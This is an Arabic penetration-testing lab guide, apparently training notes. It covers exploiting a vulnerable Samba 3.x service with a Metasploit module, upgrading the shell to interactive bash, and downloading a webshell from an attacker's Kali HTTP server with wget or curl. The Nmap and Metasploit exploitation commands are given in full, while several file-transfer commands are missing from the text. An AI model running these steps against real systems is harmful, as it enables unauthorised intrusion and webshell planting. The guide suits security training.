🧪 3. نقل الملفات إلى أهداف Linux ( Transferring Files To Linux Targets)

🎯 الهدف الأساسي: بعد الحصول على Command Shell على نظام Linux مستهدف، نقل ملفات الأدوات (مثل Webshells أو سكريبتات Bash) من نظام Kali Linux (المهاجم) إلى النظام المستهدف باستخدام خادم HTTP وwget أو curl.

🔧 الأدوات المستخدمة:

  • Nmap

  • Metasploit Framework (MSFConsole)

  • exploit/unix/samba/is_known_pipe (Metasploit module لثغرة Samba)

  • Linux Bash Shell commands: /bin/bash -i, cd, wget, curl

  • Python 3 (http.server)

📜 خطوات التنفيذ:

📊 أولاً: الاستطلاع والفحص والاستغلال (Reconnaissance, Scanning & Exploitation) 🗣️ إذا حصلت على عنوان IP الخاص بالنظام المستهدف.

  • إذا نفذت فحص Nmap لتحديد الخدمات المفتوحة وإصداراتها على المنفذ 445:

    nmap -sV -p 445 [Target IP]

    فسوف يظهر لك أن المنفذ 445 مفتوح وتعمل عليه خدمة Samba بإصدار 3.x.

  • إذا عرفت أن خدمة Samba بإصدار 3.x ضعيفة (ثغرة is_known_pipe للوصول عن بعد)، فعليك استخدام وحدة الاستغلال الخاصة بها:

    msfconsole -q
    use exploit/unix/samba/is_known_pipe
    set RHOSTS [Target IP]
    exploit

    فسوف تحصل على جلسة Command Shell (وليس Meterpreter).

  • لترقية Command Shell إلى Bash Shell تفاعلي:

    /bin/bash -i

    فسوف تحصل على جلسة Bash Shell تفاعلية.

📊 ثانياً: إعداد خادم HTTP على Kali (Post-Exploitation - File Transfer)

  • لو فتحت New Tab في Terminal الخاص بـ Kali.

  • لو توجهت إلى المجلد الذي يحتوي على الملفات التي تريد نقلها.

  • لو قمت بتشغيل خادم HTTP بسيط على المنفذ 80:

    فسوف يبدأ خادم HTTP في مشاركة ملفات المجلد.

📊 ثالثاً: نقل الملفات إلى Linux Target باستخدام wget أو curl (Post-Exploitation - File Transfer)

  • لو عدت إلى جلسة Bash Shell على النظام المستهدف.

  • لو أردت الانتقال إلى مجلد مؤقت لتخزين الملف فيه (مثل /tmp):

  • 🔑لو كتبت الأمر التالي لتنزيل الملف (مثلاً webshell.php) من خادم HTTP على Kali:

    أو:

    فسوف يقوم الأمر wget أو curl بتنزيل الملف من خادم HTTP على Kali وحفظه على النظام المستهدف.

    • في Terminal الخاص بخادم HTTP على Kali، فسوف تلاحظ طلب GET الناجح.

نقاط التحقق:

  • الوصول إلى جلسة Command Shell ثم ترقيتها إلى Bash Shell.

  • نجاح تشغيل خادم HTTP على Kali.

  • 🔑 نجاح تنزيل الملف على النظام المستهدف باستخدام wget أو curl.

  • رؤية طلب GET في سجلات خادم HTTP على Kali.

Last updated